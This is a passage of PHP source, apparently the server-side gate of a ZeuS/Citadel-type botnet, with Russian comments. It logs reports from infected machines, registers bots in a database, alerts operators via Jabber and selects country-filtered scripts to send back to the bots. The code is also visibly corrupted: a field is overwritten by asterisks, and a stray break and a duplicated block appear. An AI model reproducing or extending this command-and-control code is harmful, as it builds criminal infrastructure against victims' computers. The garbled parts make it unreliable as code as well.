//Запись в файл.
if ($config['reports_to_fs'] === 1) {
if (isHackNameForPath($botId) || isHackNameForPath($botnet)) {
die;
}
$file_path = $config['reports_path'] . '/other/' . urlencode($botnet) . '/' . urlencode($botId);
if (!createDir($file_path) || !($h = fopen($file_path . '/reports.txt', 'ab'))) {
die;
}
flock($h, LOCK_EX);
fwrite($h, str_repeat("=", 80) . "\r\n" . "bot_id={$botId}\r\n" . "botnet={$botnet}\r\n" . "bot_version=" . intToVersion($botVersion) . "\r\n" . "ipv4={$realIpv4}\r\n" . "country={$country}\r\n" . "type={$type}\r\n" . "rtime=" . gmdate('H:i:s d.m.Y', $curTime) . "\r\n" . "time_system=" . (empty($list[SBCID_TIME_SYSTEM]) ? 0 : gmdate('H:i:s d.m.Y', toInt($list[SBCID_TIME_SYSTEM]))) . "\r\n" . "time_tick=" . (empty($list[SBCID_TIME_TICK]) ? 0 : tickCountToText(toUint($list[SBCID_TIME_TICK]) / 1000)) . "\r\n" . "time_localbias=" . (empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : timeBiasToText(toInt($list[SBCID_TIME_LOCALBIAS]))) . "\r\n" . "os_version=" . (empty($list[SBCID_OS_INFO]) ? '' : osDataToString($list[SBCID_OS_INFO])) . "\r\n" . "language_id=" . (empty($list[SBCID_LANGUAGE_ID]) ? 0 : toUshort($list[SBCID_LANGUAGE_ID])) . "\r\n" . "process_name=" . (empty($list[SBCID_PROCESS_NAME]) ? '' : $list[SBCID_PROCESS_NAME]) . "\r\n" . "process_user="******"\r\n" . "path_source=" . (empty($list[SBCID_PATH_SOURCE]) ? '' : $list[SBCID_PATH_SOURCE]) . "\r\n" . "context=\r\n" . $list[SBCID_BOTLOG] . "\r\n\r\n\r\n");
flock($h, LOCK_UN);
fclose($h);
}
if ($config['reports_jn'] === 1) {
imNotify($type, $list, $botId);
}
}
} else {
if (!empty($list[SBCID_NET_LATENCY])) {
//Стандартный запрос.
$query = "`bot_id`='{$botIdQ}', `botnet`='{$botnetQ}', `bot_version`={$botVersion}, `country`='{$countryQ}', `rtime_last`={$curTime}, " . "`net_latency`=" . (empty($list[SBCID_NET_LATENCY]) ? 0 : toUint($list[SBCID_NET_LATENCY])) . ", " . "`tcpport_s1`=" . (empty($list[SBCID_TCPPORT_S1]) ? 0 : toUshort($list[SBCID_TCPPORT_S1])) . ", " . "`time_localbias`=" . (empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : toInt($list[SBCID_TIME_LOCALBIAS])) . ", " . "`os_version`='" . (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO])) . "', " . "`language_id`=" . (empty($list[SBCID_LANGUAGE_ID]) ? 0 : toUshort($list[SBCID_LANGUAGE_ID])) . ", " . "`ipv4_list`='" . (empty($list[SBCID_IPV4_ADDRESSES]) ? '' : addslashes($list[SBCID_IPV4_ADDRESSES])) . "', " . "`ipv6_list`='" . (empty($list[SBCID_IPV6_ADDRESSES]) ? '' : addslashes($list[SBCID_IPV6_ADDRESSES])) . "', " . "`ipv4`='" . addslashes(pack('N', ip2long($realIpv4))) . "'";
if (!mysqlQueryEx('botnet_list', "INSERT INTO `botnet_list` SET `comment`='', `rtime_first`={$curTime}, `rtime_online`={$curTime}, {$query} " . "ON DUPLICATE KEY UPDATE `rtime_online`=IF(`rtime_last` <= " . ($curTime - $config['botnet_timeout']) . ", {$curTime}, `rtime_online`), {$query}")) {
die;
}
unset($query);
//Поиск скриптов для отправки.
$replyData = '';
$replyCount = 0;
$botIdQm = toSqlSafeMask($botIdQ);
$botnetQm = toSqlSafeMask($botnetQ);
$botnet_list_op = 'ERROR';
break;
}
unset($query);
// Update country on insert
if ($country == '??' && ($botnet_list_op == 'INSERT' || rand(0, 60 * 3) == 0)) {
$country = ipv4toc($realIpv4);
mysql_query("UPDATE `botnet_list` SET `country`='{$country}' WHERE `bot_id`='{$botIdQ}';");
}
// Tell whether this bot has just appeared online
$wentOnline = $botnet_list_op == 'INSERT' || (bool) mysql_result(mysql_query("SELECT `rtime_online`={$curTime} FROM `botnet_list` WHERE `bot_id`='{$botIdQ}';"), 0, 0);
if ($wentOnline) {
GATE_DEBUG_MODE && GateLog::get()->log(GateLog::L_TRACE, 'type.latency', 'The bot has just went online!');
}
// Notify Jabber subscribers that a new bot has appeared
imNotify($type, $list, $botId, $botnet_list_op == 'INSERT', $wentOnline);
// mask check happens beneath the curtain
//Поиск скриптов для отправки.
$replyData = '';
$replyCount = 0;
$botIdQm = toSqlSafeMask($botIdQ);
$botnetQm = toSqlSafeMask($botnetQ);
$countryQm = toSqlSafeMask($countryQ);
$r = mysqlQueryEx('botnet_scripts', "SELECT `extern_id`, `script_bin`, `send_limit`, `id`, `name`, `script_text` FROM `botnet_scripts` WHERE `flag_enabled`=1 AND " . "(`countries_wl`='' OR `countries_wl` LIKE BINARY '%{$countryQm}%') AND " . "(`countries_bl` NOT LIKE BINARY '%{$countryQm}%') AND " . "(`botnets_wl`='' OR `botnets_wl` LIKE BINARY '%{$botnetQm}%') AND " . "(`botnets_bl` NOT LIKE BINARY '%{$botnetQm}%') AND " . "(`bots_wl`='' OR `bots_wl` LIKE BINARY '%{$botIdQm}%') AND " . "(`bots_bl` NOT LIKE BINARY '%{$botIdQm}%') " . "LIMIT 10");
if ($r) {
while ($m = mysql_fetch_row($r)) {
$eid = addslashes($m[0]);
//Проверяем, не достигнут ли лимит.
if ($m[2] != 0 && ($j = mysqlQueryEx('botnet_scripts_stat', "SELECT COUNT(*) FROM `botnet_scripts_stat` WHERE `type`=1 AND `extern_id`='{$eid}'")) && ($c = mysql_fetch_row($j)) && $c[0] >= $m[2]) {
mysqlQueryEx('botnet_scripts', "UPDATE `botnet_scripts` SET `flag_enabled`=0 WHERE `id`={$m[3]} LIMIT 1");
continue;
